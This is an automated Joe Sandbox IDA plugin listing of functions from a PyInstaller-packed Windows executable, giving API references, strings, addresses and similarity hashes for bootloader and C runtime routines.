Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: 342efc223edf27d6efe885fa86135ee1c51794963c66c520f10f4686fe324ec9
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 8351D926618BA186D634BF26E4581BAB7A1F798B61F004135EFDE83798DF3CD045DB10

Function 00007FF6448780C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF6448780FF
GetWindowLongPtrW.USER32 ref: 00007FF64487817F
ShutdownBlockReasonCreate.USER32 ref: 00007FF644878192
GetLastError.KERNEL32 ref: 00007FF64487819C
SetWindowLongPtrW.USER32 ref: 00007FF6448781B3

Strings

Needs to remove its temporary files., xrefs: 00007FF644878185

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction ID: 53fbc21aa26a1c8baebb89bf1b785cb32d0e9083d5ce3d1d857dcd68926cce1a
Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
Instruction Fuzzy Hash: 76216221B0CE46CAEA41BB7AACD61796290FF88F90F584231DE1DC339CDE2CD5918211

Function 00007FF644886290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448862D3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448866C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488695C

Strings

-, xrefs: 00007FF644886369
:, xrefs: 00007FF64488648C
p, xrefs: 00007FF644886385
f, xrefs: 00007FF6448863F5
p, xrefs: 00007FF6448863FD

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 00d9f1a30a038057ea36a85810fac9fbb01438922ab9e1257e04274049b1e1a2
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: DF129571E0C2878AFB20BF14D1966797691FB50750F884935EE8DA66CCDF3CE9809B10

Function 00007FF644880FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF644881008
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6448813D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF64488166F

Strings

p, xrefs: 00007FF644881112
f, xrefs: 00007FF644881255
f, xrefs: 00007FF64488110A
p, xrefs: 00007FF6448810AD
f, xrefs: 00007FF6448810A0

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: 1710dfed5af7060dc4ace23094578b604852e3ed78ce30615364b073edafc303
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: DF128672E1C1438AFB24BE14E0966B9B6A1FB40755F944135DEDAC6ACCDF7CE8809B10

Function 00007FF644871050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF644871108
Failed to extract %s: failed to open archive file!, xrefs: 00007FF644871098
fread, xrefs: 00007FF6448711FD
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6448711F6
malloc, xrefs: 00007FF64487110F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6448710CC
fseek, xrefs: 00007FF6448710D3

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
Instruction ID: 7459360ec29d47892f7ca7b3f226f9c7bfae7500f501a5feadf30b27caba8821
Opcode Fuzzy Hash: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
Instruction Fuzzy Hash: EB416F22B1C6528AEA10FB51AC926B96390FF85BC4F544432ED4C8BB9FDE3CE5058740

Function 00007FF644871470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF644871518
Failed to extract %s: failed to open archive file!, xrefs: 00007FF64487149F
fread, xrefs: 00007FF6448715E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6448715DF
malloc, xrefs: 00007FF64487151F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6448714DE
fseek, xrefs: 00007FF6448714E5

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
Instruction ID: f54d446251908911f64f5b2f4d617ffb33ebb7b5daef46f80cba576e1df611c2
Opcode Fuzzy Hash: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
Instruction Fuzzy Hash: 3B416022B1C6428EEB14FB2198925B96390FF84B94F444536ED4D97B9EEF3CE501C704

Function 00007FF64487EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF64487EA65

Part of subcall function 00007FF64487F9BC: __GetUnwindTryBlock.LIBCMT ref: 00007FF64487F9FF
Part of subcall function 00007FF64487F9BC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF64487FA24

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF64487EB3D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF64487ED8B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF64487EE98

Strings

csm, xrefs: 00007FF64487EA7F
csm, xrefs: 00007FF64487EAE6
csm, xrefs: 00007FF64487EB60

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction ID: f8330fd1725a1a2278a1144c19ed880de9d01afa05512aeb3700ab5d900907b7
Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
Instruction Fuzzy Hash: 86D15E22A0C7418AFB60FB6598923BDBBA0FB55788F104535DE4D97B9ADF38E491C700

Function 00007FF644872C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
MessageBoxW.USER32 ref: 00007FF644872D99

Strings

%ls: , xrefs: 00007FF644872D22
<FormatMessageW failed.>, xrefs: 00007FF644872D70
Error, xrefs: 00007FF644872D8C
[PYI-%d:ERROR] , xrefs: 00007FF644872CA6

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction ID: 9403c8673401f80a69e7cffd16a5ecb000d3d4a53e4aec06535fd581193eb089
Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
Instruction Fuzzy Hash: 1731E82270CB4146E720BB25B8916AA6691BFC8B98F414136EF4DD3B5DEF3CD506C300

Function 00007FF64487DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD4D
GetLastError.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD85
FreeLibrary.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDF3
GetProcAddress.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDFF

Strings

api-ms-, xrefs: 00007FF64487DD6D

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: 6a837562c8b4d135d430ccc6166c386bbaccc413c31492c88e02c2c725605bf4
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 9F318721B1EA42DAEE11FB169C925B527D4FF48BA4F598536DD2D87388EF3CE4448310

Function 00007FF644876360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

LoadLibrary, xrefs: 00007FF6448764AE
ucrtbase.dll, xrefs: 00007FF6448763DD
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF644876407
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6448763C7
Failed to load Python DLL '%ls'., xrefs: 00007FF6448764A7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF644876456

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction ID: 021450b99195abb182eb78ddebe253e38f3fe9423bc474d40665ae69ee38e4bb
Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
Instruction Fuzzy Hash: D9418121B1CA86D9EA11FB20E8A61E96351FF94394F900132DE5C8369DEF3CE505C740

Function 00007FF644872A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF64487351A,?,00000000,00007FF644873F1B), ref: 00007FF644872AA0

Strings

Warning, xrefs: 00007FF644872B1E
WARNING, xrefs: 00007FF644872AAF
[PYI-%d:%s] , xrefs: 00007FF644872AA8
Warning [ANSI Fallback], xrefs: 00007FF644872B0F
0, xrefs: 00007FF644872B16

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 48c668cb77eb8570dffbbe990ad76f74f03ae4f8b597ce6cd77e2415a8efa627
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: 38216D22B1DB8186E720BB51B8927E6A294BB88784F400136EE8D93A5DDF7CD2458740

Function 00007FF64488B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF64488B15F
FlsGetValue.KERNEL32 ref: 00007FF64488B174
FlsSetValue.KERNEL32 ref: 00007FF64488B195
FlsSetValue.KERNEL32 ref: 00007FF64488B1C2
FlsSetValue.KERNEL32 ref: 00007FF64488B1D3
FlsSetValue.KERNEL32 ref: 00007FF64488B1E4
SetLastError.KERNEL32 ref: 00007FF64488B1FF

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction ID: a068081b1ad647b364f6ad8202f0667a0feb1ebce3b1417bd714d0b92f124744
Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
Instruction Fuzzy Hash: AC212F24B0D6428DF969B3619AD713961525FC4BB0F144634EE3EDAADEDE2CF4408301

Function 00007FF644897D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF644897D9D
GetLastError.KERNEL32 ref: 00007FF644897DA9
CloseHandle.KERNEL32 ref: 00007FF644897DC1
CreateFileW.KERNEL32 ref: 00007FF644897DEC
WriteConsoleW.KERNEL32 ref: 00007FF644897E0B

Strings

CONOUT$, xrefs: 00007FF644897DCD

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: 828454efcfa034140589112358b03fffd4cc8a91845e4d36557791bea7db6807
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: DB114C21B1CE41CAE750BB52A896329A6A0FB88FE4F044634EE5DC77A8DF7DD854C740

Function 00007FF644878ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878F5A

Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF64487906A

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction ID: ea800eb5fccd425ef51aff986e17c76569fcd7bf882b6aca6ee07065e78cff51
Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
Instruction Fuzzy Hash: F0419362B1D68289FA30BB12A9922BA73A4FB95BD4F450135DF4D9778DDE3CE500C700

Function 00007FF64488B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B2D7
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B30D
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B33A
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B34B
FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B35C
SetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B377

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction ID: 684177b36193b1b24bf5b413935c2ba1f59ef53dd8a831283c63d5280a02d0e5
Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
Instruction Fuzzy Hash: 59113830B4C6428AFA59B7659AD713D62829FC4BB0F044634EE2ED6ADEDE2CF4018301

Function 00007FF644872910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF644872966
%s: %s, xrefs: 00007FF6448729E8
Error [ANSI Fallback], xrefs: 00007FF6448729FF
Error, xrefs: 00007FF644872A0E

Memory Dump Source

Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true

Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
